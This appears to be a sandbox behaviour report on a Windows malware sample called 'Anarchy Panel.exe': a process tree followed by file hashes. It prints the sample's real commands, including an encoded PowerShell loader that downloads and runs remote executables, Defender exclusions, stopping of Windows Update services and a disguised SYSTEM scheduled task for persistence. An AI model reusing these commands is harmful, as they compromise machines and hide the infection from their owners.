C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2564
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2632
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2648
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2616
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2600
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2512
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2496
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2452
-
C:\Windows\system32\sihost.exesihost.exe1⤵
- Modifies registry class
PID:2424
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2324
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2316
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3492
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3492 -s 4842⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4248
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3788
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3632
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3632 -s 3882⤵
- Program crash
PID:2304
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3292
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
PID:3136 -
C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe"C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3108 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAaQBrACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcABhAGsAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAYgBkAHQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABkAGMAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAG4AaQBwAGsAdgAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAegB3AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBxAGkAYgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBsAGgAYQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAeABmAGgAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAeQBrAG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHQAZQB2ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwB0AGkAegAjAD4A"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1452 -
C:\Users\Admin\AppData\Local\Temp\d1vnly0k.tkm0.exe"C:\Users\Admin\AppData\Local\Temp\d1vnly0k.tkm0.exe"4⤵
- Executes dropped EXE
PID:4956 -
C:\Users\Admin\AppData\Local\Temp\d1vnly0k.tkm1.exe"C:\Users\Admin\AppData\Local\Temp\d1vnly0k.tkm1.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1496 -
C:\Users\Admin\AppData\Local\Temp\d1vnly0k.tkm2.exe"C:\Users\Admin\AppData\Local\Temp\d1vnly0k.tkm2.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:848 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:4440
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3096 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:1844 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:4452 -
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:1076 -
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:2164 -
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:1424 -
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1448 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:3344 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2160 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1932 -
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:3628 -
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4216 -
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1700 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#hgkvzf#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineCPS' /tr '''C:\Program Files\Google\Chrome\updaters.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updaters.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineCPS' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2308 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:916
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineCPS"2⤵PID:1988
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3220
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:536 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:836
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:2092
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4480
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2964 -
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:4632 -
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:3308 -
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2732 -
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:3432 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:4956
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1272
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:3588
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:2212
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:3376
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:3512
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:1472
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#hgkvzf#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineCPS' /tr '''C:\Program Files\Google\Chrome\updaters.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updaters.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineCPS' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Modifies data under HKEY_USERS
PID:5104 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2700
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:3512
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:2772
-
C:\Users\Admin\AppData\Local\Temp\d1vnly0k.tkm2.exe"C:\Users\Admin\AppData\Local\Temp\d1vnly0k.tkm2.exe"2⤵PID:3212
-
C:\Users\Admin\AppData\Local\Temp\d1vnly0k.tkm1.exe"C:\Users\Admin\AppData\Local\Temp\d1vnly0k.tkm1.exe"2⤵PID:2548
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵PID:3784
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:3208
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:1580 -
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:3564 -
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:4044 -
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2796 -
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1344 -
C:\Users\Admin\AppData\Local\Temp\d1vnly0k.tkm0.exe"C:\Users\Admin\AppData\Local\Temp\d1vnly0k.tkm0.exe"2⤵PID:3656
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:1548
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:4200
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:4820
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:4144
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:3648
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:908
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#hgkvzf#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineCPS' /tr '''C:\Program Files\Google\Chrome\updaters.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updaters.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineCPS' -User 'System' -RunLevel 'Highest' -Force; }2⤵PID:4512
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineCPS"2⤵PID:2248
-
C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe"C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe"2⤵PID:2780
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAaQBrACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcABhAGsAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAYgBkAHQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABkAGMAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAG4AaQBwAGsAdgAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAegB3AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBxAGkAYgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBsAGgAYQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAeABmAGgAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAeQBrAG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHQAZQB2ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwB0AGkAegAjAD4A"3⤵PID:3612
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵PID:3944
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:220
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:4980 -
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:3604 -
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:2064 -
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2284 -
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:4596 -
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:4912
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#hgkvzf#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineCPS' /tr '''C:\Program Files\Google\Chrome\updaters.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updaters.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineCPS' -User 'System' -RunLevel 'Highest' -Force; }2⤵PID:2472
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3052
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2076
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2044
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1976
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1968
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1868
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1808
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1772
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1676
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1660
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1588
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1556
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1440
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1428
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1408
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3584
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1324
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1228
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4904
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p1⤵PID:1160
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:1800
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s W32Time1⤵PID:4432
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious behavior: EnumeratesProcesses
PID:3716 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 404 -p 3492 -ip 34922⤵PID:1728
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 488 -p 3632 -ip 36322⤵PID:336
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 508 -p 4676 -ip 46762⤵PID:2504
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 568 -p 1120 -ip 11202⤵PID:3452
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:3972
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:3860
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:4680
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:5052
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:3260
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:3340
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:1448
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4676 -s 2281⤵
- Program crash
PID:1784
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1120 -s 3881⤵
- Program crash
PID:4476
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3480
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.8MB
MD55f2f1ae240812065799e8c05d3a01aa7
SHA1e14d1c6a64f27267c688b695da84b7a9527a3d13
SHA256adad69d9a6bf24c7739cc25cf4def1b96d05accc349ed86e9200d404c039ad03
SHA512d92339a954509b988b6eb3b7508182a7773489aa27ed88ddaf6c5f3a3f26f345c8463bf688b40cc99b9728bc47c1b4e1ad8175a9e07fe576a216c9521cb07f50
-
Filesize
5.8MB
MD55f2f1ae240812065799e8c05d3a01aa7
SHA1e14d1c6a64f27267c688b695da84b7a9527a3d13
SHA256adad69d9a6bf24c7739cc25cf4def1b96d05accc349ed86e9200d404c039ad03
SHA512d92339a954509b988b6eb3b7508182a7773489aa27ed88ddaf6c5f3a3f26f345c8463bf688b40cc99b9728bc47c1b4e1ad8175a9e07fe576a216c9521cb07f50
-
Filesize
5.8MB
MD55f2f1ae240812065799e8c05d3a01aa7
SHA1e14d1c6a64f27267c688b695da84b7a9527a3d13
SHA256adad69d9a6bf24c7739cc25cf4def1b96d05accc349ed86e9200d404c039ad03
SHA512d92339a954509b988b6eb3b7508182a7773489aa27ed88ddaf6c5f3a3f26f345c8463bf688b40cc99b9728bc47c1b4e1ad8175a9e07fe576a216c9521cb07f50
-
Filesize
5.8MB
MD55f2f1ae240812065799e8c05d3a01aa7
SHA1e14d1c6a64f27267c688b695da84b7a9527a3d13
SHA256adad69d9a6bf24c7739cc25cf4def1b96d05accc349ed86e9200d404c039ad03
SHA512d92339a954509b988b6eb3b7508182a7773489aa27ed88ddaf6c5f3a3f26f345c8463bf688b40cc99b9728bc47c1b4e1ad8175a9e07fe576a216c9521cb07f50
-
Filesize
39KB
MD5fc4eeeed6a50b560df301a5362c42e5d
SHA156d3199e94a036251f9918b8129371bc57593ed6
SHA256f708d779e5049ceaae7f3181c908df28aa4d7240068193673d52be13588ea766
SHA512e1ed88a219b76e92a449bf427eb55aaeb0e43eefa79913e15a2cfc407db64de052d4a49109c9acdd8cfa9829e69f322a7d603503363e814fca0d1a4d4ceb499d
-
Filesize
39KB
MD57c764b6af8be101cd645f89acc453a8c
SHA130cee9362f804018c8449ae4e253dac43310331e
SHA256bef91cafe5064c93f5843f490e3d88fcec1b11f0fd80a03d1a5ebabfa5db38c0
SHA512088d5d4b6ffa4baa50f39c1be292df33adda3f7d7e9f2cb5589da4983b8b6a341cb1c032c90ae8c404bcc7e7569a6505758c89c992720e1f1bdb2b8822a7c7f4
-
Filesize
13KB
MD572e031233ff2e44109b9f7d12c6a8c1f
SHA17a5725fe48b5a9647d49de78c471cac0a6894d8c
SHA256de8a40b5ea92f3c083682354fac434d8fc4b968d16335226d09ccbf928373af2
